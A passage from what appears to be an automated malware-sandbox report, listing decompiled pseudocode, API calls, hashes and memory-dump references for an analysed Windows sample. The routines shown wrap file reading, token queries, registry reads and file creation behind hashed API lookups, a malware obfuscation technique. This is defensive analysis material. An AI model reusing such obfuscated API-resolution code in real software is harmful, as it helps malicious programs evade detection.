                                                                                                                                      • Opcode ID: 277426869cf728061e506fb31fc565e2e22a755c3941d70b021b55640b4f270a
                                                                                                                                      • Instruction ID: 896e4efff45a44a10c64bb0812f4ab051cf0ff47ad617499474d4d5d686b448a
                                                                                                                                      • Opcode Fuzzy Hash: 277426869cf728061e506fb31fc565e2e22a755c3941d70b021b55640b4f270a
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E73235DF0(void* __ecx, void* __eflags, void* _a4, char _a8) {
                                                                                                                                      				long _v12;
                                                                                                                                      				void* __esi;
                                                                                                                                      				long _t9;
                                                                                                                                      				long _t10;
                                                                                                                                      				int _t12;
                                                                                                                                      				void* _t18;
                                                                                                                                      				void** _t19;
                                                                                                                                      				DWORD* _t20;
                                                                                                                                      
                                                                                                                                      				_t18 = __ecx;
                                                                                                                                      				_t19 = __ecx + 0xc;
                                                                                                                                      				if(E7322C33C(_t19) == 0) {
                                                                                                                                      					_t2 =  &_a8; // 0x73235ce5
                                                                                                                                      					_v12 =  *_t2;
                                                                                                                                      					if(E73232F8C(0x4bcc7cba, 0x2876e068) == 0) {
                                                                                                                                      						_t9 = 0x7f;
                                                                                                                                      					} else {
                                                                                                                                      						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
                                                                                                                                      						if(_t12 == 0) {
                                                                                                                                      							_t9 = E7323352C(_t18);
                                                                                                                                      						} else {
                                                                                                                                      							_t9 = 0;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					 *((intOrPtr*)(_t18 + 8)) = _t9;
                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                      						_t10 = _v12;
                                                                                                                                      					} else {
                                                                                                                                      						_t10 = 0;
                                                                                                                                      						_v12 = 0;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t10 = 0;
                                                                                                                                      				}
                                                                                                                                      				return _t10;
                                                                                                                                      			}











                                                                                                                                      0x73235df3
                                                                                                                                      0x73235df5
                                                                                                                                      0x73235e01
                                                                                                                                      0x73235e07
                                                                                                                                      0x73235e0b
                                                                                                                                      0x73235e21
                                                                                                                                      0x73235e40
                                                                                                                                      0x73235e23
                                                                                                                                      0x73235e34
                                                                                                                                      0x73235e38
                                                                                                                                      0x73235e58
                                                                                                                                      0x73235e3a
                                                                                                                                      0x73235e3a
                                                                                                                                      0x73235e3a
                                                                                                                                      0x73235e38
                                                                                                                                      0x73235e41
                                                                                                                                      0x73235e46
                                                                                                                                      0x73235e4f
                                                                                                                                      0x73235e48
                                                                                                                                      0x73235e48
                                                                                                                                      0x73235e4a
                                                                                                                                      0x73235e4a
                                                                                                                                      0x73235e03
                                                                                                                                      0x73235e03
                                                                                                                                      0x73235e03
                                                                                                                                      0x73235e55

                                                                                                                                      APIs
                                                                                                                                      • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,73235CE5,00000000,?,00000000,?), ref: 73235E34
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileRead
                                                                                                                                      • String ID: \#s
                                                                                                                                      • API String ID: 2738559852-962363717
                                                                                                                                      • Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
                                                                                                                                      • Instruction ID: 9474a4fa1af5ee9656d16c3e9255cde08db6e97936433239c5b9a16bf37bf2f1
                                                                                                                                      • Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
                                                                                                                                      • Instruction Fuzzy Hash: 91F0A4F1319717AFDB119F25CC40B6B7BE5AF4A240F604C29A8DED6144EB31D48487A5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                      			E73231140(void* __ecx, void* __edi, void* __esi) {
                                                                                                                                      				long _v12;
                                                                                                                                      				void* _v20;
                                                                                                                                      				void* _v24;
                                                                                                                                      				char _v32;
                                                                                                                                      				void* _v40;
                                                                                                                                      				void* _v44;
                                                                                                                                      				void* _v48;
                                                                                                                                      				void* _v52;
                                                                                                                                      				void* _v56;
                                                                                                                                      				void* _v64;
                                                                                                                                      				int _t31;
                                                                                                                                      				void* _t33;
                                                                                                                                      				long* _t39;
                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                      				void* _t54;
                                                                                                                                      				void* _t56;
                                                                                                                                      				void* _t58;
                                                                                                                                      				long* _t59;
                                                                                                                                      
                                                                                                                                      				_t59 = _t58 - 0x20;
                                                                                                                                      				_t56 = __ecx;
                                                                                                                                      				_v12 = 0;
                                                                                                                                      				_t46 = E73232F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
                                                                                                                                      				if(_t46 != 0) {
                                                                                                                                      					 *_t46(_t56, 8,  &_v12);
                                                                                                                                      				}
                                                                                                                                      				_t39 = _t59;
                                                                                                                                      				 *_t39 = _v12;
                                                                                                                                      				_t39[1] = 1;
                                                                                                                                      				if(E7322C33C(_t39) != 0) {
                                                                                                                                      					L6:
                                                                                                                                      					if(_t59[1] != 0) {
                                                                                                                                      						E7322BC00(_t59);
                                                                                                                                      					}
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t59[6] = 0;
                                                                                                                                      					if(E73232F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
                                                                                                                                      						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
                                                                                                                                      					}
                                                                                                                                      					_t24 = _t59[6];
                                                                                                                                      					if(_t59[6] != 0) {
                                                                                                                                      						E7322F620( &_v32, _t24);
                                                                                                                                      						_t54 = E7322F558( &(_t59[3]), 0);
                                                                                                                                      						if(E73232F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
                                                                                                                                      							L14:
                                                                                                                                      							E7322F6F0( &_v32);
                                                                                                                                      							goto L6;
                                                                                                                                      						} else {
                                                                                                                                      							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
                                                                                                                                      							if(_t31 == 0) {
                                                                                                                                      								goto L14;
                                                                                                                                      							} else {
                                                                                                                                      								_t33 = E73232F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
                                                                                                                                      								if(_t33 == 0) {
                                                                                                                                      									goto L14;
                                                                                                                                      								} else {
                                                                                                                                      									_push( *_t54);
                                                                                                                                      									asm("int3");
                                                                                                                                      									return _t33;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						goto L6;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}





















                                                                                                                                      0x73231142
                                                                                                                                      0x7323114f
                                                                                                                                      0x73231151
                                                                                                                                      0x73231160
                                                                                                                                      0x73231164
                                                                                                                                      0x7323116e
                                                                                                                                      0x7323116e
                                                                                                                                      0x73231174
                                                                                                                                      0x73231177
                                                                                                                                      0x73231179
                                                                                                                                      0x73231184
                                                                                                                                      0x732311be
                                                                                                                                      0x732311c3
                                                                                                                                      0x732311c8
                                                                                                                                      0x732311c8
                                                                                                                                      0x732311d4
                                                                                                                                      0x73231186
                                                                                                                                      0x73231190
                                                                                                                                      0x732311a3
                                                                                                                                      0x732311b4
                                                                                                                                      0x732311b4
                                                                                                                                      0x732311b6
                                                                                                                                      0x732311bc
                                                                                                                                      0x732311da
                                                                                                                                      0x732311ea
                                                                                                                                      0x73231201
                                                                                                                                      0x732312e3
                                                                                                                                      0x732312e7
                                                                                                                                      0x00000000
                                                                                                                                      0x73231207
                                                                                                                                      0x73231217
                                                                                                                                      0x7323121b
                                                                                                                                      0x00000000
                                                                                                                                      0x73231221
                                                                                                                                      0x7323122d
                                                                                                                                      0x73231234
                                                                                                                                      0x00000000
                                                                                                                                      0x7323123a
                                                                                                                                      0x7323123a
                                                                                                                                      0x7323123c
                                                                                                                                      0x7323123d
                                                                                                                                      0x7323123d
                                                                                                                                      0x73231234
                                                                                                                                      0x7323121b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732311bc

                                                                                                                                      APIs
                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 732311B4
                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 73231217
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InformationToken
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4114910276-0
                                                                                                                                      • Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
                                                                                                                                      • Instruction ID: d3d0beef49e01286ac6bef7412846737e45cdf8a5de3cf3f368a837fe57c364c
                                                                                                                                      • Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
                                                                                                                                      • Instruction Fuzzy Hash: 84217EB07083067FFB05EA68CC04FAB76A99FD6A01F54C828B495D6191EFB4D8898761
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                      			E73235720(void* __ecx, char* _a4, intOrPtr _a8) {
                                                                                                                                      				int _v16;
                                                                                                                                      				int _v20;
                                                                                                                                      				intOrPtr _t11;
                                                                                                                                      				int* _t12;
                                                                                                                                      				int _t13;
                                                                                                                                      				void* _t23;
                                                                                                                                      				char* _t35;
                                                                                                                                      				int* _t38;
                                                                                                                                      
                                                                                                                                      				_push(_t34);
                                                                                                                                      				_t23 = __ecx;
                                                                                                                                      				_t11 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                                      				if(_t11 == 0 || _t11 == 0xffffffff) {
                                                                                                                                      					_t12 = 1;
                                                                                                                                      				} else {
                                                                                                                                      					_t12 = 0;
                                                                                                                                      				}
                                                                                                                                      				if(_t12 != 0) {
                                                                                                                                      					L10:
                                                                                                                                      					_t13 = 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t35 = _a4;
                                                                                                                                      					if(_t35 == 0 ||  *_t35 != 0) {
                                                                                                                                      						_v20 = 0;
                                                                                                                                      						_v16 = 0;
                                                                                                                                      						if(E73232F8C(0xd0443458, 0x91134e46) != 0) {
                                                                                                                                      							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
                                                                                                                                      						}
                                                                                                                                      						_t15 = _v16;
                                                                                                                                      						if(_v16 != 0) {
                                                                                                                                      							E7322F8C4(_a8, _t15);
                                                                                                                                      							if(E73232F8C(0xd0443458, 0x91134e46) != 0) {
                                                                                                                                      								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E7322F558(_a8, 0),  &_v20); // executed
                                                                                                                                      							}
                                                                                                                                      							_t13 = _v20;
                                                                                                                                      						} else {
                                                                                                                                      							goto L10;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						goto L10;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t13;
                                                                                                                                      			}











                                                                                                                                      0x73235724
                                                                                                                                      0x73235725
                                                                                                                                      0x73235727
                                                                                                                                      0x7323572c
                                                                                                                                      0x73235733
                                                                                                                                      0x73235737
                                                                                                                                      0x73235737
                                                                                                                                      0x73235737
                                                                                                                                      0x7323573b
                                                                                                                                      0x73235781
                                                                                                                                      0x73235781
                                                                                                                                      0x7323573d
                                                                                                                                      0x7323573d
                                                                                                                                      0x73235743
                                                                                                                                      0x7323574c
                                                                                                                                      0x7323574f
                                                                                                                                      0x73235766
                                                                                                                                      0x73235777
                                                                                                                                      0x73235777
                                                                                                                                      0x73235779
                                                                                                                                      0x7323577f
                                                                                                                                      0x7323578a
                                                                                                                                      0x732357a2
                                                                                                                                      0x732357c2
                                                                                                                                      0x732357c2
                                                                                                                                      0x732357c4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73235743
                                                                                                                                      0x732357cc

                                                                                                                                      APIs
                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,7323D1F8,00000000,?,00000000,00000000,?,?,?,7323D1F8,?,732357F3,?,00000000,00000000), ref: 73235777
                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,7323D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,7323D1F8,?,732357F3,?,00000000), ref: 732357C2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: QueryValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                      • Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
                                                                                                                                      • Instruction ID: 980535e230ddbef052b709b6e673f789b28a053333696537b9e6d4153c0537c4
                                                                                                                                      • Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
                                                                                                                                      • Instruction Fuzzy Hash: BF11D3F120930AFFE615DE25DC80FABBFECDF82654F64441DF48A97180DA74E88096A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 66%
                                                                                                                                      			E73235AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
                                                                                                                                      				char _v24;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t16;
                                                                                                                                      				void* _t21;
                                                                                                                                      				void* _t24;
                                                                                                                                      				void* _t29;
                                                                                                                                      				long _t37;
                                                                                                                                      				void* _t38;
                                                                                                                                      				long _t39;
                                                                                                                                      				WCHAR** _t40;
                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                      				WCHAR** _t58;
                                                                                                                                      				char* _t64;
                                                                                                                                      				void* _t65;
                                                                                                                                      				long _t66;
                                                                                                                                      
                                                                                                                                      				_push(0);
                                                                                                                                      				_push(_t62);
                                                                                                                                      				_t66 = _t65 - 0x10;
                                                                                                                                      				_t58 = __ecx;
                                                                                                                                      				_t37 = _a8;
                                                                                                                                      				if(E7322D288(__ecx, 0x2f) != 0) {
                                                                                                                                      					_t62 = _t66;
                                                                                                                                      					E7322D78C(__ecx, _t66);
                                                                                                                                      					E7322D0B4(_t58,  *_t66);
                                                                                                                                      					E7322D098(_t66);
                                                                                                                                      				}
                                                                                                                                      				if(_t37 == 0) {
                                                                                                                                      					_t70 = _a4 - 1;
                                                                                                                                      					if(_a4 != 1) {
                                                                                                                                      						__eflags = _a4 - 4;
                                                                                                                                      						_t37 = (0 | _a4 == 0x00000004) + 2;
                                                                                                                                      						__eflags = _t37;
                                                                                                                                      					} else {
                                                                                                                                      						_t37 = 1;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				E7323621C(_t70);
                                                                                                                                      				if(_a4 <= 5) {
                                                                                                                                      					goto __eax;
                                                                                                                                      				}
                                                                                                                                      				_t62 = 0;
                                                                                                                                      				if(_t37 != 2) {
                                                                                                                                      					_t16 = 3;
                                                                                                                                      					__eflags = _t37 - 1;
                                                                                                                                      					_t38 = 0;
                                                                                                                                      					_t39 =  ==  ? _t16 : _t38;
                                                                                                                                      				} else {
                                                                                                                                      					_t39 = 1;
                                                                                                                                      				}
                                                                                                                                      				if(E73232F8C(0x4bcc7cba, 0x80c50a91) == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      				} else {
                                                                                                                                      					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
                                                                                                                                      					_push(_t29);
                                                                                                                                      				}
                                                                                                                                      				_t40 =  &(_t58[3]);
                                                                                                                                      				E7322C328(_t40);
                                                                                                                                      				if(E7322C33C(_t40) != 0) {
                                                                                                                                      					_t58[2] = E7323352C(0);
                                                                                                                                      					_t21 = 0;
                                                                                                                                      					goto L19;
                                                                                                                                      				} else {
                                                                                                                                      					if(_a4 == 2) {
                                                                                                                                      						_t56 = E73232F8C(0x4bcc7cba, 0xceed09cc);
                                                                                                                                      						__eflags = _t56;
                                                                                                                                      						if(_t56 != 0) {
                                                                                                                                      							 *_t56( *_t40, 0, 0, 2);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t64 =  &_v24;
                                                                                                                                      					E732335D4(_t64, 0xff, 8);
                                                                                                                                      					_t66 = _t66 + 0xc;
                                                                                                                                      					_t24 = E73232F8C(0x4bcc7cba, 0xaaa9bb);
                                                                                                                                      					if(_t24 == 0) {
                                                                                                                                      						_t21 = 1;
                                                                                                                                      						__eflags = 1;
                                                                                                                                      						L19:
                                                                                                                                      						return _t21;
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t64);
                                                                                                                                      						_push(_t64);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push( *_t40);
                                                                                                                                      						asm("int3");
                                                                                                                                      						return _t24;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}


















                                                                                                                                      0x73235aa8
                                                                                                                                      0x73235aab
                                                                                                                                      0x73235aac
                                                                                                                                      0x73235aaf
                                                                                                                                      0x73235ab1
                                                                                                                                      0x73235abe
                                                                                                                                      0x73235ac2
                                                                                                                                      0x73235ac6
                                                                                                                                      0x73235ad0
                                                                                                                                      0x73235ad7
                                                                                                                                      0x73235ad7
                                                                                                                                      0x73235ade
                                                                                                                                      0x73235ae0
                                                                                                                                      0x73235ae5
                                                                                                                                      0x73235aee
                                                                                                                                      0x73235af6
                                                                                                                                      0x73235af6
                                                                                                                                      0x73235ae7
                                                                                                                                      0x73235ae9
                                                                                                                                      0x73235ae9
                                                                                                                                      0x73235ae5
                                                                                                                                      0x73235afb
                                                                                                                                      0x73235b07
                                                                                                                                      0x73235b1d
                                                                                                                                      0x73235b1d
                                                                                                                                      0x73235c38
                                                                                                                                      0x73235b75
                                                                                                                                      0x73235b7e
                                                                                                                                      0x73235b7f
                                                                                                                                      0x73235b84
                                                                                                                                      0x73235b85
                                                                                                                                      0x73235b77
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b9b
                                                                                                                                      0x73235baf
                                                                                                                                      0x73235b9d
                                                                                                                                      0x73235baa
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bb1
                                                                                                                                      0x73235bb6
                                                                                                                                      0x73235bc4
                                                                                                                                      0x73235c2f
                                                                                                                                      0x73235c32
                                                                                                                                      0x00000000
                                                                                                                                      0x73235bc6
                                                                                                                                      0x73235bcb
                                                                                                                                      0x73235c18
                                                                                                                                      0x73235c1a
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235bcd
                                                                                                                                      0x73235bd9
                                                                                                                                      0x73235bde
                                                                                                                                      0x73235beb
                                                                                                                                      0x73235bf2
                                                                                                                                      0x73235bfe
                                                                                                                                      0x73235bfe
                                                                                                                                      0x73235bff
                                                                                                                                      0x73235c06
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf5
                                                                                                                                      0x73235bf6
                                                                                                                                      0x73235bf8
                                                                                                                                      0x73235bfa
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bf2

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 58244e9efbe5eb0b2eba7d1ced9fa9bea7df8e1936ffbcd6e99164ab56eff514
                                                                                                                                      • Instruction ID: 77fe6ad4d53537b705a266a5a6dcbd03f08bd31129892dc9305c6a81e044e789
                                                                                                                                      • Opcode Fuzzy Hash: 58244e9efbe5eb0b2eba7d1ced9fa9bea7df8e1936ffbcd6e99164ab56eff514
                                                                                                                                      • Instruction Fuzzy Hash: 263109F1354306AFE7112A708C80F3F7EEFEF83245FA50828F94A96085DEA189C58265
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                      			E73235B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                      				void* _t7;
                                                                                                                                      				void* _t12;
                                                                                                                                      				void* _t15;
                                                                                                                                      				void* _t20;
                                                                                                                                      				void* _t21;
                                                                                                                                      				void* _t22;
                                                                                                                                      				long _t23;
                                                                                                                                      				WCHAR** _t24;
                                                                                                                                      				intOrPtr* _t32;
                                                                                                                                      				WCHAR** _t33;
                                                                                                                                      				long _t37;
                                                                                                                                      				void* _t39;
                                                                                                                                      				void* _t40;
                                                                                                                                      
                                                                                                                                      				_t33 = __edi;
                                                                                                                                      				if(__edx != 0) {
                                                                                                                                      					_t37 = 3;
                                                                                                                                      					if(_t21 != 2) {
                                                                                                                                      						_t7 = 3;
                                                                                                                                      						_t22 = 0;
                                                                                                                                      						_t23 =  ==  ? _t7 : _t22;
                                                                                                                                      					} else {
                                                                                                                                      						_t23 = 1;
                                                                                                                                      					}
                                                                                                                                      					if(E73232F8C(0x4bcc7cba, 0x80c50a91) == 0) {
                                                                                                                                      						_push(0);
                                                                                                                                      					} else {
                                                                                                                                      						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
                                                                                                                                      						_push(_t20);
                                                                                                                                      					}
                                                                                                                                      					_t24 =  &(_t33[3]);
                                                                                                                                      					E7322C328(_t24);
                                                                                                                                      					if(E7322C33C(_t24) != 0) {
                                                                                                                                      						_t33[2] = E7323352C(0x80000000);
                                                                                                                                      						_t12 = 0;
                                                                                                                                      						goto L14;
                                                                                                                                      					} else {
                                                                                                                                      						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
                                                                                                                                      							_t32 = E73232F8C(0x4bcc7cba, 0xceed09cc);
                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                      								 *_t32( *_t24, 0, 0, 2);
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						_t39 = _t40 + 8;
                                                                                                                                      						E732335D4(_t39, 0xff, 8);
                                                                                                                                      						_t40 = _t40 + 0xc;
                                                                                                                                      						_t15 = E73232F8C(0x4bcc7cba, 0xaaa9bb);
                                                                                                                                      						if(_t15 == 0) {
                                                                                                                                      							_t12 = 1;
                                                                                                                                      							goto L14;
                                                                                                                                      						} else {
                                                                                                                                      							_push(_t39);
                                                                                                                                      							_push(_t39);
                                                                                                                                      							_push(0);
                                                                                                                                      							_push( *_t24);
                                                                                                                                      							asm("int3");
                                                                                                                                      							return _t15;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					__edi[2] = 2;
                                                                                                                                      					_t12 = 0;
                                                                                                                                      					L14:
                                                                                                                                      					return _t12;
                                                                                                                                      				}
                                                                                                                                      			}
















                                                                                                                                      0x73235b51
                                                                                                                                      0x73235b53
                                                                                                                                      0x73235b6a
                                                                                                                                      0x73235b75
                                                                                                                                      0x73235b7e
                                                                                                                                      0x73235b84
                                                                                                                                      0x73235b85
                                                                                                                                      0x73235b77
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b9b
                                                                                                                                      0x73235baf
                                                                                                                                      0x73235b9d
                                                                                                                                      0x73235baa
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bb1
                                                                                                                                      0x73235bb6
                                                                                                                                      0x73235bc4
                                                                                                                                      0x73235c2f
                                                                                                                                      0x73235c32
                                                                                                                                      0x00000000
                                                                                                                                      0x73235bc6
                                                                                                                                      0x73235bcb
                                                                                                                                      0x73235c18
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235bcd
                                                                                                                                      0x73235bd9
                                                                                                                                      0x73235bde
                                                                                                                                      0x73235beb
                                                                                                                                      0x73235bf2
                                                                                                                                      0x73235bfe
                                                                                                                                      0x00000000
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf5
                                                                                                                                      0x73235bf6
                                                                                                                                      0x73235bf8
                                                                                                                                      0x73235bfa
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bf2
                                                                                                                                      0x73235b55
                                                                                                                                      0x73235b55
                                                                                                                                      0x73235b5c
                                                                                                                                      0x73235bff
                                                                                                                                      0x73235c06
                                                                                                                                      0x73235c06

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73235BAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                      • Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
                                                                                                                                      • Instruction ID: a9cd4baef35d2dd4ef827775a33169a2c70ec07f8dce2409e5369382f71b5155
                                                                                                                                      • Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
                                                                                                                                      • Instruction Fuzzy Hash: AB01D6F5394307BAE71116108C81F2BBE5FDF83254FA44C65F94A560C9DBB254D88161
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 56%
                                                                                                                                      			E73235B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                      				void* _t7;
                                                                                                                                      				void* _t12;
                                                                                                                                      				void* _t15;
                                                                                                                                      				void* _t20;
                                                                                                                                      				void* _t22;
                                                                                                                                      				long _t23;
                                                                                                                                      				WCHAR** _t24;
                                                                                                                                      				void* _t31;
                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                      				WCHAR** _t34;
                                                                                                                                      				void* _t38;
                                                                                                                                      				long _t39;
                                                                                                                                      				void* _t41;
                                                                                                                                      				void* _t42;
                                                                                                                                      
                                                                                                                                      				_t34 = __edi;
                                                                                                                                      				_t31 = 5;
                                                                                                                                      				_t38 = 2;
                                                                                                                                      				_t39 =  !=  ? _t31 : _t38;
                                                                                                                                      				if(__ebx != 2) {
                                                                                                                                      					_t7 = 3;
                                                                                                                                      					_t22 = 0;
                                                                                                                                      					_t23 =  ==  ? _t7 : _t22;
                                                                                                                                      				} else {
